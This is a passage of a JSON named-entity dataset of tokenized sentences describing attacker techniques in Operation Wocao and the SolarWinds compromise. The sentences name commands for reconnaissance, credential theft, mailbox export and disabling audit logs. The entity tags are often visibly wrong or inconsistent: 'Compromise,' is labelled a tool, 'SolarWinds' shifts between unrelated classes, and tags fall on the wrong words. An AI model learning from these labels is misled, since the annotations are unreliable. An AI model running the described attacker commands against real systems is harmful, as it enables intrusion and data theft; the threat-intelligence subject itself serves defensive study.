"O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "executed", "commands", "through", "the", "installed", "web", "shell", "via", "Tor", "exit", "nodes." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "the", "`CreateProcessA`", "and", "`ShellExecute`", "API", "functions", "to", "launch", "commands", "after", "being", "injected", "into", "a", "selected", "process." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "scanned", "for", "open", "ports", "and", "used", "nbtscan", "to", "find", "NETBIOS", "nameservers." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "discovered", "network", "disks", "mounted", "to", "the", "system", "using", "netstat." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "a", "custom", "protocol", "for", "command", "and", "control." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "the", "threat", "actors", "used", "uncommon", "high", "ports", "for", "its", "backdoor", "C2,", "including", "ports", "25667", "and", "47000." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "accessed", "and", "collected", "credentials", "from", "password", "managers." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "discovered", "removable", "disks", "attached", "to", "a", "system." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "PowerShell", "on", "compromised", "systems." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "Mimikatz", "to", "dump", "certificates", "and", "private", "keys", "from", "the", "Windows", "certificate", "store." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "the", "threat", "actors", "used", "`tasklist`", "to", "collect", "a", "list", "of", "running", "processes", "on", "an", "infected", "system." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "injected", "code", "into", "a", "selected", "process,", "which", "in", "turn", "launches", "a", "command", "as", "a", "child", "process", "of", "the", "original." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "a", "custom", "proxy", "tool", "called", "\"Agent\"", "which", "has", "support", "for", "multiple", "hops." ], "ner_tags": [ "O", "I-OffAct", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors'", "backdoors", "were", "written", "in", "Python", "and", "compiled", "with", "py2exe." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "the", "threat", "actors", "executed", "`/c", "cd", "/d", "c:\\windows\\temp\\", "&", "reg", "query", "HKEY_CURRENT_USER\\Software\\<username>\\PuTTY\\Sessions\\`", "to", "detect", "recent", "PuTTY", "sessions,", "likely", "to", "further", "lateral", "movement." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "`nbtscan`", "and", "`ping`", "to", "discover", "remote", "systems,", "as", "well", "as", "`dsquery", "subnet`", "on", "a", "domain", "controller", "to", "retrieve", "all", "subnets", "in", "the", "Active", "Directory." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "Impacket's", "smbexec.py", "as", "well", "as", "accessing", "the", "C$", "and", "IPC$", "shares", "to", "move", "laterally." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "scheduled", "tasks", "to", "execute", "malicious", "PowerShell", "code", "on", "remote", "systems." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "scripts", "to", "detect", "security", "software." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Wocao,", "the", "threat", "actors", "purchased", "servers", "with", "Bitcoin", "to", "use", "during", "the", "operation." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "created", "services", "on", "remote", "systems", "for", "execution", "purposes." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "collected", "a", "list", "of", "installed", "software", "on", "the", "infected", "system." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "discovered", "the", "local", "disks", "attached", "to", "the", "system", "and", "their", "hardware", "information", "including", "manufacturer", "and", "model,", "as", "well", "as", "the", "OS", "versions", "of", "systems", "connected", "to", "a", "targeted", "network." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "discovered", "the", "local", "network", "configuration", "with", "`ipconfig`." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "collected", "a", "list", "of", "open", "connections", "on", "the", "infected", "system", "using", "`netstat`", "and", "checks", "whether", "it", "has", "an", "internet", "connection." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "enumerated", "sessions", "and", "users", "on", "a", "remote", "host,", "and", "identified", "privileged", "users", "logged", "into", "a", "targeted", "system." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "the", "`tasklist`", "command", "to", "search", "for", "one", "of", "its", "backdoors." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "the", "`time`", "command", "to", "retrieve", "the", "current", "time", "of", "a", "compromised", "system." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Wocao,", "the", "threat", "actors", "obtained", "a", "variety", "of", "open", "source", "tools,", "including", "JexBoss,", "KeeThief,", "and", "BloodHound." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "valid", "VPN", "credentials", "to", "gain", "initial", "access." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "VBScript", "to", "conduct", "reconnaissance", "on", "targeted", "systems." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors’", "XServer", "tool", "communicated", "using", "HTTP", "and", "HTTPS." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "their", "own", "web", "shells,", "as", "well", "as", "those", "previously", "placed", "on", "target", "systems", "by", "other", "threat", "actors,", "for", "reconnaissance", "and", "lateral", "movement." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "spawned", "a", "new", "`cmd.exe`", "process", "to", "execute", "commands." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "has", "used", "WMI", "to", "execute", "commands." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "obtained", "a", "list", "of", "users", "and", "their", "roles", "from", "an", "Exchange", "server", "using", "`Get-ManagementRoleAssignment`." ], "ner_tags": [ "O", "O", "B-Exp", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "added", "credentials", "to", "OAuth", "Applications", "and", "Service", "Principals." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "granted", "`company", "administrator`", "privileges", "to", "a", "newly", "created", "service", "principle." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "added", "their", "own", "devices", "as", "allowed", "IDs", "for", "active", "sync", "using", "`Set-CASMailbox`,", "allowing", "it", "to", "obtain", "copies", "of", "victim", "mailboxes.", "It", "also", "added", "additional", "permissions", "(such", "as", "Mail.Read", "and", "Mail.ReadWrite)", "to", "compromised", "Application", "or", "Service", "Principals." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "compromised", "service", "principals", "to", "make", "changes", "to", "the", "Office", "365", "environment." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "7-Zip", "to", "compress", "stolen", "emails", "into", "password-protected", "archives", "prior", "to", "exfltration;", "APT29", "also", "compressed", "text", "files", "into", "zipped", "archives." ], "ner_tags": [ "O", "O", "B-Exp", "O", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "removed", "evidence", "of", "email", "export", "requests", "using", "`Remove-MailboxExportRequest`." ], "ner_tags": [ "O", "O", "B-Exp", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "a", "compromised", "O365", "administrator", "account", "to", "create", "a", "new", "Service", "Principal." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "downloaded", "source", "code", "from", "code", "repositories." ], "ner_tags": [ "O", "O", "B-Idus", "O", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "was", "able", "to", "get", "SUNBURST", "signed", "by", "SolarWinds", "code", "signing", "certificates", "by", "injecting", "the", "malware", "into", "the", "SolarWinds", "Orion", "software", "lifecycle." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "gained", "initial", "network", "access", "to", "some", "victims", "via", "a", "trojanized", "update", "of", "SolarWinds", "Orion", "software." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "For", "the", "SolarWinds", "Compromise,", "APT29", "conducted", "credential", "theft", "operations", "to", "obtain", "credentials", "to", "be", "used", "for", "access", "to", "victim", "environments." ], "ner_tags": [ "O", "O", "B-Idus", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "account", "credentials", "they", "obtained", "to", "attempt", "access", "to", "Group", "Managed", "Service", "Account", "(gMSA)", "passwords." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "stole", "users'", "saved", "passwords", "from", "Chrome." ], "ner_tags": [ "O", "O", "B-Features", "B-Exp", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "privileged", "accounts", "to", "replicate", "directory", "service", "data", "with", "domain", "controllers." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "accessed", "victims'", "internal", "knowledge", "repositories", "(wikis)", "to", "view", "sensitive", "corporate", "information", "on", "products,", "services,", "and", "internal", "business", "operations." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "extracted", "files", "from", "compromised", "networks." ], "ner_tags": [ "O", "O", "B-Features", "O", "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "7-Zip", "to", "decode", "their", "Raindrop", "malware." ], "ner_tags": [ "O", "O", "B-Idus", "O", "B-Idus", "O", "B-Way", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "registered", "devices", "in", "order", "to", "enable", "mailbox", "syncing", "via", "the", "`Set-CASMailbox`", "command." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29,", "used", "`AUDITPOL`", "to", "prevent", "the", "collection", "of", "audit", "logs." ], "ner_tags": [ "O", "O", "B-Idus", "O", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "`netsh`", "to", "configure", "firewall", "rules", "that", "limited", "certain", "UDP", "outbound", "packets." ], "ner_tags": [ "O", "O", "B-Exp", "O", "B-Idus", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "the", "service", "control", "manager", "on", "a", "remote", "system", "to", "disable", "services", "associated", "with", "security", "monitoring", "products." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "PowerShell", "to", "discover", "domain", "accounts", "by", "exectuing", "`Get-ADUser`", "and", "`Get-ADGroupMember`." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "domain", "administrators'", "accounts", "to", "help", "facilitate", "lateral", "movement", "on", "compromised", "networks." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "AdFind", "to", "enumerate", "domain", "groups." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "the", "`Get-AcceptedDomain`", "PowerShell", "cmdlet", "to", "enumerate", "accepted", "domains", "through", "an", "Exchange", "Management", "Shell.", "They", "also", "used", "AdFind", "to", "enumerate", "domains", "and", "to", "discover", "trust", "between", "federated", "domains." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "For", "the", "SolarWinds", "Compromise,", "APT29", "acquired", "C2", "domains,", "sometimes", "through", "resellers." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "the", "SolarWinds", "Compromise,", "APT29", "compromised", "domains", "to", "use", "for", "C2." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "dynamic", "DNS", "resolution", "to", "construct", "and", "resolve", "to", "randomly-generated", "subdomains", "for", "C2." ], "ner_tags": [ "O", "O", "B-Features", "B-Exp", "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "exfiltrated", "collected", "data", "over", "a", "simple", "HTTPS", "request", "to", "a", "password-protected", "archive", "staged", "on", "a", "victim's", "OWA", "servers." ], "ner_tags": [ "O", "O", "B-Exp", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "exploited", "CVE-2020-0688", "against", "the", "Microsoft", "Exchange", "Control", "Panel", "to", "regain", "access", "to", "a", "network." ], "ner_tags": [ "O", "O", "B-Features", "B-SecTeam", "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "the", "SolarWinds", "Compromise,", "APT29", "used", "compromised", "identities", "to", "access", "networks", "via", "SSH,", "VPNs,", "and", "other", "remote", "access", "tools." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "routinely", "removed", "their", "tools,", "including", "custom", "backdoors,", "once", "remote", "access", "was", "achieved." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "obtained", "information", "about", "the", "configured", "Exchange", "virtual", "directory", "using", "`Get-WebServicesVirtualDirectory`." ], "ner_tags": [ "O", "O", "B-Features", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "set", "the", "hostnames", "of", "their", "C2", "infrastructure", "to", "match", "legitimate", "hostnames", "in", "the", "victim", "environment.", "They", "also", "used", "IP", "addresses", "originating", "from", "the", "same", "country", "as", "the", "victim", "for", "their", "VPN", "infrastructure." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "temporarily", "replaced", "legitimate", "utilities", "with", "their", "own,", "executed", "their", "payload,", "and", "then", "restored", "the", "original", "file." ], "ner_tags": [ "O", "O", "B-Features", "O", "B-Idus", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "downloaded", "additional", "malware,", "such", "as", "TEARDROP", "and", "Cobalt", "Strike,", "onto", "a", "compromised", "host", "following", "initial", "access." ], "ner_tags": [ "O", "O", "B-Features", "B-Exp", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "SSH", "port", "forwarding", "capabilities", "on", "public-facing", "systems,", "and", "configured", "at", "least", "one", "instance", "of", "Cobalt", "Strike", "to", "use", "a", "network", "pipe", "over", "SMB." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "B-Way", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "I-Way", "I-Way", "O", "B-Way" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "GoldFinder", "to", "perform", "HTTP", "GET", "requests", "to", "check", "internet", "connectivity", "and", "identify", "HTTP", "proxy", "servers", "and", "other", "redirectors", "that", "an", "HTTP", "request", "travels", "through." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "obtained", "Ticket", "Granting", "Service", "(TGS)", "tickets", "for", "Active", "Directory", "Service", "Principle", "Names", "to", "crack", "offline." ], "ner_tags": [ "O", "O", "B-Features", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "compromised", "local", "accounts", "to", "access", "victims'", "networks." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "the", "SolarWinds", "Compromise,", "APT29", "used", "numerous", "pieces", "of", "malware", "that", "were", "likely", "developed", "for", "or", "by", "the", "group,", "including", "SUNBURST,", "SUNSPOT,", "Raindrop,", "and", "TEARDROP." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "named", "tasks", "`\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager`", "in", "order", "to", "appear", "legitimate." ], "ner_tags": [ "O", "O", "B-Features", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "renamed", "software", "and", "DLLs", "with", "legitimate", "names", "to", "appear", "benign." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "the", "`Get-ManagementRoleAssignment`", "PowerShell", "cmdlet", "to", "enumerate", "Exchange", "management", "role", "assignments", "through", "an", "Exchange", "Management", "Shell." ], "ner_tags": [ "O", "O", "B-Idus", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "PowerShell", "to", "create", "new", "tasks", "on", "remote", "machines,", "identify", "configuration", "settings,", "exfiltrate", "data,", "and", "execute", "other", "commands." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "obtained", "PKI", "keys,", "certificate", "files,", "and", "the", "private", "encryption", "key", "from", "an", "Active", "Directory", "Federation", "Services", "(AD", "FS)", "container", "to", "decrypt", "corresponding", "SAML", "signing", "certificates." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "multiple", "command-line", "utilities", "to", "enumerate", "running", "processes." ], "ner_tags": [ "O", "O", "B-Idus", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "staged", "data", "and", "files", "in", "password-protected", "archives", "on", "a", "victim's", "OWA", "server." ], "ner_tags": [ "O", "O", "B-Features", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "RDP", "sessions", "from", "public-facing", "systems", "to", "internal", "servers." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "collected", "emails", "from", "specific", "individuals,", "such", "as", "executives", "and", "IT", "staff,", "using", "`New-MailboxExportRequest`", "followed", "by", "`Get-MailboxExportRequest`." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Org", "O", "O", "O", "B-Org", "O", "I-Org", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "AdFind", "to", "enumerate", "remote", "systems." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "`Rundll32.exe`", "to", "execute", "payloads." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "created", 